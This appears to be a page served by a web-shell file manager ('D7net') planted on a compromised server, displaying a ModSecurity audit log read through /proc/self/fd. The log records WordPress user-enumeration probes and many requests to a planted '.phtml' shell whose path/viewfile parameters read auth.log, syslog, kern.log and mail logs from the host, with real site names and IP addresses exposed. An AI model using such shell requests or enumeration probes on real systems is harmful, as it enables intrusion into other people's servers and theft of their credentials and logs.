D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
proc
/
self
/
fd
/
Filename :
5
back
Copy
--182ed55f-A-- [17/Jun/2025:00:03:36.666493 +0530] aFBjf43q6eGJ2xNcTd6AYAAAAAU 35.231.88.242 37712 127.0.0.1 7081 --182ed55f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 35.231.88.242 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --182ed55f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --182ed55f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBjf43q6eGJ2xNcTd6AYAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750098815153702 1512869 (- - -) Stopwatch2: 1750098815153702 1512869; combined=1974, p1=351, p2=1534, p3=0, p4=0, p5=89, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --182ed55f-Z-- --fc841e4e-A-- [17/Jun/2025:00:05:25.038590 +0530] aFBj7Y3q6eGJ2xNcTd6AywAAAAU 52.3.104.214 60998 127.0.0.1 7081 --fc841e4e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/lvm/profile&viewfile=//etc/lvm/profile/command_profile_template.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.104.214 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --fc841e4e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4054 Connection: close Content-Type: text/html; charset=UTF-8 --fc841e4e-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/command_profile_template.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/lvm/profile/command_profile_template.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBj7Y3q6eGJ2xNcTd6AywAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750098925034057 4603 (- - -) Stopwatch2: 1750098925034057 4603; combined=2292, p1=333, p2=1786, p3=48, p4=45, p5=80, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc841e4e-Z-- --160cc86c-A-- [17/Jun/2025:00:07:17.440764 +0530] aFBkXX3hoSwVUy254pHutQAAACQ 172.68.7.52 44448 127.0.0.1 7081 --160cc86c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.68.7.52 X-Forwarded-For: 34.23.188.104 Connection: close cf-ray: 950c6ae5ecef8cfd-MIA cdn-loop: cloudflare; loops=1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 accept-encoding: gzip, br x-forwarded-proto: https cf-ipcountry: US cf-connecting-ip: 34.23.188.104 cf-visitor: {"scheme":"https"} --160cc86c-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.2.28 X-Robots-Tag: noindex Link: <https://www.getcalley.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Vary: Origin,Accept-Encoding Content-Encoding: gzip Content-Length: 124 Connection: close Content-Type: application/json; charset=UTF-8 --160cc86c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.getcalley.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.getcalley.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBkXX3hoSwVUy254pHutQAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750099037166379 274559 (- - -) Stopwatch2: 1750099037166379 274559; combined=2002, p1=400, p2=1479, p3=0, p4=0, p5=122, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --160cc86c-Z-- --6f2cfd29-A-- [17/Jun/2025:00:09:30.898239 +0530] aFBk4o3q6eGJ2xNcTd6BpgAAAAU 216.73.216.71 53210 127.0.0.1 7081 --6f2cfd29-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fauth.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6f2cfd29-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2991 Connection: close Content-Type: text/html; charset=UTF-8 --6f2cfd29-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBk4o3q6eGJ2xNcTd6BpgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099170893819 4486 (- - -) Stopwatch2: 1750099170893819 4486; combined=2394, p1=356, p2=1895, p3=43, p4=38, p5=62, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f2cfd29-Z-- --15ab2759-A-- [17/Jun/2025:00:10:16.589141 +0530] aFBlEI3q6eGJ2xNcTd6ByQAAAAU 216.73.216.71 43594 127.0.0.1 7081 --15ab2759-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmaillog.processed HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --15ab2759-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2996 Connection: close Content-Type: text/html; charset=UTF-8 --15ab2759-H-- Message: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/maillog found within ARGS:viewfile: /proc/thread-self/root/var/log/maillog.processed"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBlEI3q6eGJ2xNcTd6ByQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099216584402 4795 (- - -) Stopwatch2: 1750099216584402 4795; combined=2644, p1=392, p2=2107, p3=40, p4=40, p5=65, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --15ab2759-Z-- --2b05d93f-A-- [17/Jun/2025:00:11:06.243361 +0530] aFBlQBwcFb_n1P0IC9xgkQAAAAo 34.105.87.208 44902 127.0.0.1 7081 --2b05d93f-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 34.105.87.208 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --2b05d93f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --2b05d93f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBlQBwcFb_n1P0IC9xgkQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750099264713012 1530427 (- - -) Stopwatch2: 1750099264713012 1530427; combined=2076, p1=371, p2=1607, p3=0, p4=0, p5=97, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b05d93f-Z-- --09970b79-A-- [17/Jun/2025:00:11:10.538024 +0530] aFBlRhwcFb_n1P0IC9xgmAAAAAo 216.73.216.71 34922 127.0.0.1 7081 --09970b79-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fauth.log HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --09970b79-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --09970b79-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBlRhwcFb_n1P0IC9xgmAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099270534257 3821 (- - -) Stopwatch2: 1750099270534257 3821; combined=1991, p1=334, p2=1537, p3=34, p4=32, p5=54, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --09970b79-Z-- --fa1dc831-A-- [17/Jun/2025:00:12:49.956786 +0530] aFBlqSid3pHxA3RhGpzlsQAAAAk 216.73.216.71 37968 127.0.0.1 7081 --fa1dc831-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fkern.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --fa1dc831-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2991 Connection: close Content-Type: text/html; charset=UTF-8 --fa1dc831-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBlqSid3pHxA3RhGpzlsQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099369952549 4292 (- - -) Stopwatch2: 1750099369952549 4292; combined=2359, p1=351, p2=1865, p3=37, p4=49, p5=57, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa1dc831-Z-- --ff77b043-A-- [17/Jun/2025:00:12:56.136444 +0530] aFBlsFJfblPUQiSn5r1dIwAAAAA 216.73.216.71 38744 127.0.0.1 7081 --ff77b043-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fsyslog.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --ff77b043-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2989 Connection: close Content-Type: text/html; charset=UTF-8 --ff77b043-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBlsFJfblPUQiSn5r1dIwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099376132054 4446 (- - -) Stopwatch2: 1750099376132054 4446; combined=2389, p1=442, p2=1814, p3=38, p4=35, p5=59, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ff77b043-Z-- --d113941a-A-- [17/Jun/2025:00:13:00.596398 +0530] aFBltH3hoSwVUy254pHv1wAAACQ 216.73.216.71 41208 127.0.0.1 7081 --d113941a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmail.err.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --d113941a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2991 Connection: close Content-Type: text/html; charset=UTF-8 --d113941a-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBltH3hoSwVUy254pHv1wAAACQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099380592319 4148 (- - -) Stopwatch2: 1750099380592319 4148; combined=2223, p1=333, p2=1770, p3=35, p4=33, p5=52, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d113941a-Z-- --1c9cad0b-A-- [17/Jun/2025:00:13:40.992063 +0530] aFBl3JlL5_2Zd8wUdfLEogAAAAg 216.73.216.71 34268 127.0.0.1 7081 --1c9cad0b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fauth.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1c9cad0b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --1c9cad0b-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBl3JlL5_2Zd8wUdfLEogAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099420987674 4463 (- - -) Stopwatch2: 1750099420987674 4463; combined=2373, p1=338, p2=1876, p3=52, p4=36, p5=71, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c9cad0b-Z-- --7c2d3174-A-- [17/Jun/2025:00:13:48.458008 +0530] aFBl5I3q6eGJ2xNcTd6CeAAAAAU 216.73.216.71 35210 127.0.0.1 7081 --7c2d3174-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fauth.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --7c2d3174-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2993 Connection: close Content-Type: text/html; charset=UTF-8 --7c2d3174-H-- Message: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/auth.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/auth.log found within ARGS:viewfile: /proc/thread-self/root/var/log/auth.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBl5I3q6eGJ2xNcTd6CeAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099428454064 4011 (- - -) Stopwatch2: 1750099428454064 4011; combined=2175, p1=332, p2=1705, p3=37, p4=35, p5=66, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7c2d3174-Z-- --0587a90d-A-- [17/Jun/2025:00:13:58.023951 +0530] aFBl7iid3pHxA3RhGpzl9AAAAAk 216.73.216.71 47358 127.0.0.1 7081 --0587a90d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fauth.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0587a90d-F-- 